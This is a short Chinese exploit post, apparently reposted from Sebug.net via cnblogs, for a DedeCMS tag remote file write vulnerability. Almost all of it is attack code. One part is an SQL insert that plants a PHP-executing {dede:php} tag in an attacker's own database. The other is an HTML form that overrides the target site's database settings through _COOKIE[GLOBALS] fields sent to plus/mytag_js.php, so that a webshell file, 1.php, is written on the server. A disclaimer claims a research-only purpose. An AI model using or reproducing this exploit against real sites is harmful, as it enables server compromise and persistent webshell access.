测试方法:
@Sebug.net dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
- 前题条件,必须准备好自己的dede数据库,然后插入数据:
-
- insert into dede_mytag(aid,normbody) values(1,‘‘{dede:php}$fp
=@fopen("1.php", \‘‘a\‘‘);@fwrite($fp, \‘‘\‘‘);echo "OK";@fclose($fp);{/dede:php}‘‘);
-
- 再用下面表单提交,shell
就在同目录下1.php。原理自己研究。。。
-
- <form action="" method="post"
name="QuickSearch"
id="QuickSearch"
onsubmit="addaction();">
- <input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
- <input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
- <input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
- <input type="text" value="dbpwd"
name="_COOKIE[GLOBALS][cfg_dbpwd]"
style="width:400"><br />
- <input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
- <input type="text" value="dede_"
name="_COOKIE[GLOBALS][cfg_dbprefix]"
style="width:400"><br />
- <input type="text" value="true"
name="nocache" style="width:400">
- <input type="submit" value="提交"
name="QuickSearchBtn"><br />
- </form>
- <script>
- function
addaction()
- {
- document.QuickSearch.action=document.QuickSearch.doaction.value;
- }
- </script>
dedecms织梦 标签远程文件写入漏洞,布布扣,bubuko.com
dedecms织梦 标签远程文件写入漏洞
原文:http://www.cnblogs.com/milantgh/p/3616049.html